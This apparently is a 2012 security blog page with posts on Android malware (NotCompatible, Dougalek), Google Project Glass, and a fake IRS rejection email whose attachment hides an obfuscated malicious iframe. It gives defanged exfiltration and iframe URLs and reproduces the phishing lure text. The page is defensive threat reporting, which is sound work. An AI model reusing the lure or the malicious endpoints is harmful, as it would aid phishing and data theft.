Thursday, May 3, 2012

NotCompatible Android Malware: First-known Android Drive-By Download Attack

On May 2nd 2012, Lookout reported the first known incident where compromised websites are being used to serve malicious apps to Android users.
"NotCompatible is a new Android trojan that appears to serve as a simple TCP relay / proxy while posing as a system update. This threat does not currently appear to cause any direct harm to a target device, but could potentially be used to gain illicit access to private networks by turning an infected Android device into a proxy." - Lookout

Some of the compromised sites that we have seen have the following injected hidden Iframes:

Unsuspecting mobile users browsing hacked sites are tricked into installing NotCompatible while it masquerades itself as a system update (downloaded file named Update.apk).

Luckily, Android users that have the 'Unknown Sources' application setting turned off are not affected by this attack.

Posted by at 1 comment:
Labels: , , ,

Tuesday, April 17, 2012

Android Malware Dougalek Steals Contact Information

Dougalek is a mobile malware that runs on Android devices. It downloads and plays movie clips from a predetermined remote website while stealing information in the background.

The mobile malware requests the following permissions:

INTERNET - Allows applications to open network sockets.
READ_CONTACTS - Allows an application to read the user's contacts data.
READ_PHONE_STATE - Allows read only access to phone state.

Dougalek Permissions

Looking at the requested permissions, this kind of gives the mobile malware away by requesting more permissions than what it is trying to portray.

Dougalek Installed on the Android Device

Upon execution, Dougalek collects information from the compromised Android device and sends the stolen information to:

hxxp://depot.bulks.jp/get[random].php

Dougalek Stealing Contact Information

It also attempts to download and play a video from:

hxxp://depot.bulks.jp/movie/movie[random].mp4

Meanwhile the affected user only sees this on the screen:

Dougalek stealing information in the background
Posted by at No comments:
Labels: ,

Friday, April 6, 2012

Google's Project Glass

image courtesy of wired.com

Google has recently unveiled Project Glass.

The idea is that it's going to be a kind of an augmented-reality device that provides google services via a sort of slim eyewear.

It sounds kind of cool to be able to take photos of what you are exactly looking at, and immediately share it to your friends, access maps, and all that kind of stuff. 

But knowing that Google is an ad company, this technology will bring the ads straight into our eyeballs.

The potential applications for this kind of technology is endless, but there is one thing that I am sure of: the cyber criminals are looking forward to it too.

Watch the Project Glass Youtube video here:

Posted by at No comments:

Tuesday, March 27, 2012

Fake IRS Income Tax Appeal Rejection Notice

Fake IRS Income Tax Appeal Rejection Notice

Your income tax appeal has been declined!

Unsuspecting users who receive this fake notification via email telling them that their income tax appeal has been rejected are being lured into opening and executing malicious email attachments.

The cyber criminals are using scare tactics together with legitimate-looking rejection email notifications:

Sample message below:



Dear Chief Account Officer,

Hereby you are notified that your Income Tax Refund Appeal id# has been REJECTED. If you believe the IRS did not properly estimate your case due to a misunderstanding of the facts, be prepared to provide additional information. You can obtain the rejection details and re-submit your appeal by using the instructions in the attachment.

Internal Revenue Service
Telephone Assistance for Businesses:
Toll-Free, 1-800-829-4933
Hours of Operation: Monday Friday, 7:00 a.m. 7:00 p.m. your local time (Alaska & Hawaii follow Pacific Time).

The attachment is an html file containing an obfuscated malicious script.


Successfully deobfuscating the script yields an embedded IFrame which connects to a remote host:




The hidden IFrame has been seen to connect to these URLs:

hxxp://djhasjhjdllaloks.ru:8080/images/aublbzdni.php
hxxp://rusifhasdiuhfs.su:8080/images/aublbzdni.php

We advise our readers to beware when opening email attachments like these.

Ensure that the latest security patches and updates are applied to your computer, and keep your security software up-to-date.
Posted by at No comments:
Labels: , ,
Subscribe to: Posts (Atom)